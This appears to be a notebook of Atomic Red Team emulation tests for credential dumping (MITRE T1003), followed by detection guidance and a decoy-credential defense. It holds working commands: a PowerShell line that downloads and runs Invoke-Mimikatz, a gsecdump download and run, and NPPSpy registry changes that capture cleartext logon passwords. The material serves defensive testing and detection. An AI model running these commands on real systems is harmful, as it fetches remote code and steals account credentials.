# T1003 - OS Credential Dumping
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.

Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.


## Atomic Tests

In [ ]:
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force

### Atomic Test #1 - Powershell Mimikatz
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. 
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`
```powershell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
```

In [ ]:
Invoke-AtomicTest T1003 -TestNumbers 1

### Atomic Test #2 - Gsecdump
Dump credentials from memory using Gsecdump.

Upon successful execution, you should see domain\username's following by two 32 characters hashes.

If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. 
You will receive only error output if you do not run this test from an elevated context (run as administrator)

If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1003\bin\gsecdump.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "PathToAtomicsFolder\T1003\bin\gsecdump.exe"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe" "$binpath" 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC){
  Move-Item $binpath "PathToAtomicsFolder\T1003\bin\gsecdump.exe"
}

```

In [ ]:
Invoke-AtomicTest T1003 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\T1003\bin\gsecdump.exe -a
```

In [ ]:
Invoke-AtomicTest T1003 -TestNumbers 2

### Atomic Test #3 - Credential Dumping with NPPSpy
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: NPPSpy.dll must be available in local temp directory
##### Check Prereq Commands:
```powershell
if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
```

In [ ]:
Invoke-AtomicTest T1003 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"```

In [ ]:
Invoke-AtomicTest T1003 -TestNumbers 3

## Detection
### Windows
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.

Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. 

On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.

Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1086) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.

Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols  (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)

### Linux
To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path <code>/proc/<pid>/maps</code>, where the <code><pid></code> directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.

## Shield Active Defense
### Decoy Credentials 
 Create user credentials that are used for active defense purposes. 

 Seed a target system with credentials (such as username/password, browser tokens, and other forms of authentication data) for the purpose of engagement. Decoy credentials can be planted in many locations and leveraged in a variety of ways.
#### Opportunity
There is an opportunity to deploy a tripwire that triggers an alert when an adversary touches a network resource or uses a specific technique.
#### Use Case
A defender can seed systems with decoy credentials in a variety of locations and establish alerting that will trigger if an adversary harvests the credentials and attempts to use them.
#### Procedures
Create user credentials for a decoy account, such as 'User ABC'.  Store those credentials in the browser and other places on the system to see if an adversary attempts to harvest them.